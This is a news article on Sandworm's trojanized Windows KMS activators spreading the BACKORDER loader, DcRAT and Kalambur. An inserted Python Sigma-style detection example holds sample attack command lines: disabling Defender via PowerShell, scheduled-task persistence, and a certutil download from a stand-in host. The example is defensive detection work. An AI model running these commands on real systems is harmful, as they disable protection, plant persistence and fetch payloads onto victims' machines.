Russian Hackers Leverage Weaponized Microsoft Key Management Service (KMS) Activators To Hack Windows Systems


Feb 13, 2025 - 12:24

Russian-backed hackers, specifically the Sandworm APT group (also known as APT44 or UAC-0145), have been using weaponized Microsoft Key Management Service (KMS) activators to infiltrate Windows systems in Ukraine.

This campaign, which has been active since late 2023, exploits pirated KMS tools and fake Windows updates to distribute malware, further destabilizing Ukraine’s critical infrastructure.

The Sandworm group, affiliated with Russia’s Main Intelligence Directorate (GRU), has been targeting Ukrainian organizations for over a decade.

Since the full-scale invasion, their attacks have intensified, with a focus on state bodies and critical infrastructure.

Security researchers at SOC Prime note that the group is known for refining its tactics in Ukraine before deploying them globally.

Attack Chain

Attackers are distributing Trojanized KMS activators, such as "KMSAuto++x64_v1.8.4.zip," disguised as legitimate activation tools and aimed at users who try to bypass Windows licensing.

These malicious files, often spread through torrent sites and Ukrainian-speaking forums, initiate an infection chain when executed.

The process begins with deploying BACKORDER, a loader that disables Windows Defender and leverages Living Off the Land Binaries (LOLBINs) to evade detection.

BACKORDER then delivers the final payload, DarkCrystal RAT (DcRAT), which connects to a Command and Control (C2) server to exfiltrate sensitive data. To retain long-term access, the malware creates scheduled tasks, runs from elevated processes, and blends into legitimate system activity.

Additionally, researchers have identified a new backdoor named Kalambur, which is distributed through a typosquatted domain masquerading as a Windows Update.

Kalambur downloads a repackaged TOR binary and other attacker-controlled tools, further expanding the threat landscape.

To combat these threats, security teams can utilize Sigma rules and detection tools compatible with multiple security analytics solutions.

These rules are mapped to the MITRE ATT&CK framework and ship with metadata for threat intelligence and triage recommendations.
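To make the detection side concrete, the following is an added example (not code from the article, SOC Prime, or the EclecticIQ research) of a minimal Sigma-style matcher run over constructed Windows process-creation events. The rules encode the generic behaviours the attack chain above describes (Defender tampering by the loader, LOLBIN use, and scheduled-task persistence by DcRAT) and carry ATT&CK technique IDs the way published Sigma rules do. The command lines, paths, and host names in the sample events are assumptions constructed for illustration, not published indicators of this campaign.

```python
"""Toy Sigma-style matcher over constructed Windows process-creation events.

Added example, not code from the article or the researchers it cites. Rule
semantics follow Sigma's selection logic: every (field, values) entry must
match (AND), and within an entry any value may match (OR) as a
case-insensitive "contains". All sample events below are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    title: str
    technique: str        # MITRE ATT&CK technique ID, as Sigma rules tag them
    selection: tuple      # ((field, (value, ...)), ...)


RULES = (
    # Loader disabling Defender (assumed method: Set-MpPreference). A production
    # rule would additionally require the $true / 1 argument to cut noise.
    Rule("Defender real-time protection disabled via PowerShell", "T1562.001", (
        ("Image", ("\\powershell.exe", "\\pwsh.exe")),
        ("CommandLine", ("Set-MpPreference",)),
        ("CommandLine", ("-DisableRealtimeMonitoring", "-DisableBehaviorMonitoring",
                         "-DisableIOAVProtection")),
    )),
    Rule("Defender disabled via registry", "T1562.001", (
        ("Image", ("\\reg.exe",)),
        ("CommandLine", ("\\Windows Defender",)),
        ("CommandLine", ("DisableAntiSpyware", "DisableRealtimeMonitoring")),
    )),
    # Persistence: scheduled task whose action lives in a user-writable directory.
    Rule("Scheduled task pointing at user-writable path", "T1053.005", (
        ("Image", ("\\schtasks.exe",)),
        ("CommandLine", ("/create",)),
        ("CommandLine", ("\\AppData\\", "\\Temp\\", "\\ProgramData\\", "\\Users\\Public\\")),
    )),
    # LOLBIN download cradle (certutil / bitsadmin fetching a remote file).
    Rule("LOLBIN used to download a file", "T1105", (
        ("Image", ("\\certutil.exe", "\\bitsadmin.exe")),
        ("CommandLine", ("-urlcache", "/transfer")),
        ("CommandLine", ("http://", "https://")),
    )),
)

# Constructed sample events in Sysmon Event ID 1 / Security 4688 field style.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -WindowStyle Hidden -Command '
                    r'"Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /SC MINUTE /MO 5 /TN "WindowsUpdateCheck" '
                    r'/TR "C:\Users\victim\AppData\Roaming\Microsoft\svchost.exe" /F'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://update.example.invalid/stage2.bin "
                    r"C:\Users\Public\stage2.bin"},
    # Benign: scheduled task for a binary under Program Files.
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /SC DAILY /TN "Backup" '
                    r'/TR "C:\Program Files\BackupTool\backup.exe"'},
    # Benign: read-only Defender status query.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-MpComputerStatus"},
]


def matches(rule: Rule, event: dict) -> bool:
    """True when every selection entry has at least one value contained in the field."""
    for field, values in rule.selection:
        haystack = str(event.get(field, "")).lower()
        if not any(v.lower() in haystack for v in values):
            return False
    return True


def scan(events, rules=RULES):
    """Return (event_index, rule_title, technique) for every rule/event match."""
    hits = []
    for idx, event in enumerate(events):
        for rule in rules:
            if matches(rule, event):
                hits.append((idx, rule.title, rule.technique))
    return hits


def run_demo():
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for idx, title, technique in run_demo():
        print(f"event {idx}: {title} [{technique}]")
```

The three malicious events each fire exactly one rule and the two benign events fire none; the path-based task rule is what separates DcRAT-style persistence from a legitimate installer's task. In a real deployment these selections would be expressed as Sigma YAML and converted to the SIEM's query language rather than evaluated in Python, but the AND/OR semantics are the same.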

As these tactics continue to be refined and spread, organizations should stay informed and use behaviour-based detection to protect against such attacks.


The post Russian Hackers Leverages Weaponized Microsoft Key Management Service (KMS) To Hack Windows Systems appeared first on Cyber Security News.